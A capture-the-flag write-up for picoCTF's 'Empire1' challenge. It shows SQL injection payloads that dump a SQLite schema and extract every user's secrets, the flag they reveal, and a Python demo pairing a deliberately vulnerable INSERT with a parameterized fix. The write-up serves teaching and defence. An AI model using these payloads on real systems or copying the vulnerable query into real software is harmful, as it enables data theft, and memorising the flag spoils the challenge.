Empire1

Point: 400

Category

Web Exploitation

Question

Psst, Agent 513, now that you're an employee of Evil Empire Co., try to get their secrets off the company website. https://2019shell1.picoctf.com/problem/37779/ (link) Can you first find the secret code they assigned to you? or http://2019shell1.picoctf.com:37779

Hint

  • Pay attention to the feedback you get

  • There is very limited filtering in place - this is to stop you from breaking the challenge for yourself, not for you to bypass.

  • The database gets reverted every 2 hours if you do break it, just come back later

Solution

After registering and signing in, we see a nav bar with Add a Todo, Your Todos and Employee Listing. None of these pages seems to contain any obvious vulnerability at first glance.

Trying to add an item to the todo list, we got this HTML back:

<h1 class="page-header">Things You Gotta Do</h1>
    <ul class="list-unstyled">    
    <div class="row">
        <div class="col-md-6">
            <div class="well well-sm">
                <li>
                <strong>Very Urgent:</strong> Hello
                </li> 
            </div>
        </div>
    </div>

The "Very Urgent:" prefix is automatically prepended to any text the user submits. After trying different strategies, I found that the page is vulnerable to SQL injection using the syntax '||(SQL)||': the leading quote closes the string literal the application builds around our input, || is SQLite's string concatenation operator, and the trailing quote reopens the literal, so the result of the subquery is stored as part of the todo item and shown back to us.

First, I tried ' || (SELECT group_concat(sql) FROM sqlite_master) || ', which dumps the schema of every table, and got this:

CREATE TABLE user ( id INTEGER NOT NULL, username VARCHAR(64), name VARCHAR(128), password_hash VARCHAR(128), secret VARCHAR(128), admin INTEGER, PRIMARY KEY (id) ),CREATE UNIQUE INDEX ix_user_username ON user (username),CREATE TABLE todo ( id INTEGER NOT NULL, item VARCHAR(256), user_id INTEGER, PRIMARY KEY (id), FOREIGN KEY(user_id) REFERENCES user (id) )

Seeing the secret VARCHAR(128) column, I then tried ' || (SELECT group_concat(secret) FROM user) || '. BOOM! Going to the Your Todos tab, we get the flag in the item text: Very Urgent: Likes Oreos.,Know it all.,picoCTF{wh00t_it_a_sql_injecta4dfbd62}
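To make the mechanism concrete, here is an added example (not the challenge's own source, which we never see) that reconstructs the bug with the schema from the sqlite_master dump above. It assumes the application spliced the prefixed item straight into the INSERT statement, which is consistent with the behaviour observed; the user rows and secrets are constructed placeholders. The vulnerable insert stores the concatenated secrets of every user, while the hardened insert with bound parameters stores the payload as plain text.

```python
import sqlite3

# Schema reconstructed from the sqlite_master dump shown in the writeup
SCHEMA = """
CREATE TABLE user (
    id INTEGER NOT NULL,
    username VARCHAR(64),
    name VARCHAR(128),
    password_hash VARCHAR(128),
    secret VARCHAR(128),
    admin INTEGER,
    PRIMARY KEY (id)
);
CREATE UNIQUE INDEX ix_user_username ON user (username);
CREATE TABLE todo (
    id INTEGER NOT NULL,
    item VARCHAR(256),
    user_id INTEGER,
    PRIMARY KEY (id),
    FOREIGN KEY(user_id) REFERENCES user (id)
);
"""

# Constructed sample rows; the secrets are placeholders, not the challenge's data
SAMPLE_USERS = [
    (1, "alice", "Alice", "<hash>", "secret-alpha", 0),
    (2, "bob", "Bob", "<hash>", "secret-bravo", 0),
]

PREFIX = "Very Urgent: "
# The payload from the writeup: close the literal, concatenate a subquery, reopen it
PAYLOAD = "' || (SELECT group_concat(secret) FROM user) || '"


def make_db():
    """Fresh in-memory database with the reconstructed schema and sample users."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO user VALUES (?, ?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def add_todo_vulnerable(conn, user_id, text):
    """Assumed reconstruction of the bug: the prefixed item is formatted into
    the SQL text, so a quote inside `text` ends the string literal and the
    rest of the input is executed as SQL."""
    item = PREFIX + text
    sql = f"INSERT INTO todo (item, user_id) VALUES ('{item}', {int(user_id)})"
    conn.execute(sql)
    conn.commit()


def add_todo_safe(conn, user_id, text):
    """Hardened form: bound parameters. The driver passes `text` as a value,
    never as SQL, so quotes and || are stored literally."""
    conn.execute(
        "INSERT INTO todo (item, user_id) VALUES (?, ?)",
        (PREFIX + text, user_id),
    )
    conn.commit()


def list_todos(conn, user_id):
    """What the 'Your Todos' page would render for this user."""
    rows = conn.execute(
        "SELECT item FROM todo WHERE user_id = ? ORDER BY id", (user_id,)
    )
    return [row[0] for row in rows]


def demo(add_func):
    """Submit the payload through `add_func` and return the stored items."""
    conn = make_db()
    add_func(conn, 1, PAYLOAD)
    return list_todos(conn, 1)


if __name__ == "__main__":
    print("vulnerable:", demo(add_todo_vulnerable))
    print("safe:      ", demo(add_todo_safe))
```

The vulnerable path produces an item of the form "Very Urgent: secret-alpha,secret-bravo", mirroring the comma-separated flag line above; the parameterized path stores the payload string unchanged, which is the fix an application owner would ship.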

Flag

picoCTF{wh00t_it_a_sql_injecta4dfbd62}
